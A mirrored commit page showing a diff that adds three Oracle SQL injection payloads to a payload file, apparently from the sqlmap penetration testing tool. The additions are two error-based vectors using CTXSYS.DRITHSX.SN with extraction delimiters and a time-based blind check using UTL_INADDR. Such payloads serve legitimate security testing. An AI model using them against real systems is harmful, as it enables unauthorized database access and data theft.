Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 0c5c2aa

Browse files
stamparmstamparm
committed
adding one more error based payload for Oracle
1 parent 956a155 commit 0c5c2aa

1 file changed

Lines changed: 56 additions & 0 deletions

File tree

xml/payloads.xml

Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -792,6 +792,25 @@ Formats:
792792
</details>
793793
</test>
794794

795+
<test>
796+
<title>Oracle AND error-based - WHERE clause (ctxsys.drithsx.sn)</title>
797+
<stype>2</stype>
798+
<level>3</level>
799+
<risk>0</risk>
800+
<clause>1</clause>
801+
<where>1</where>
802+
<vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM], '[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]')</vector>
803+
<request>
804+
<payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'))</payload>
805+
</request>
806+
<response>
807+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
808+
</response>
809+
<details>
810+
<dbms>Oracle</dbms>
811+
</details>
812+
</test>
813+
795814
<test>
796815
<title>Firebird AND error-based - WHERE clause</title>
797816
<stype>2</stype>
@@ -907,6 +926,25 @@ Formats:
907926
</details>
908927
</test>
909928

929+
<test>
930+
<title>Oracle OR error-based - WHERE clause (ctxsys.drithsx.sn)</title>
931+
<stype>2</stype>
932+
<level>3</level>
933+
<risk>0</risk>
934+
<clause>1</clause>
935+
<where>1</where>
936+
<vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM], '[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]')</vector>
937+
<request>
938+
<payload>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'))</payload>
939+
</request>
940+
<response>
941+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
942+
</response>
943+
<details>
944+
<dbms>Oracle</dbms>
945+
</details>
946+
</test>
947+
910948
<test>
911949
<title>Firebird OR error-based - WHERE clause</title>
912950
<stype>2</stype>
@@ -1380,6 +1418,24 @@ Formats:
13801418
</details>
13811419
</test>
13821420

1421+
<test>
1422+
<title>Oracle AND time-based blind (heavy query)</title>
1423+
<stype>5</stype>
1424+
<level>2</level>
1425+
<risk>1</risk>
1426+
<clause>1,2,3</clause>
1427+
<where>1</where>
1428+
<request>
1429+
<payload>AND (SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM DUAL)>0</payload>
1430+
</request>
1431+
<response>
1432+
<time>[SLEEPTIME]</time>
1433+
</response>
1434+
<details>
1435+
<dbms>Oracle</dbms>
1436+
</details>
1437+
</test>
1438+
13831439
<test>
13841440
<title>Oracle AND time-based blind (heavy query)</title>
13851441
<stype>5</stype>

0 commit comments

Comments
 (0)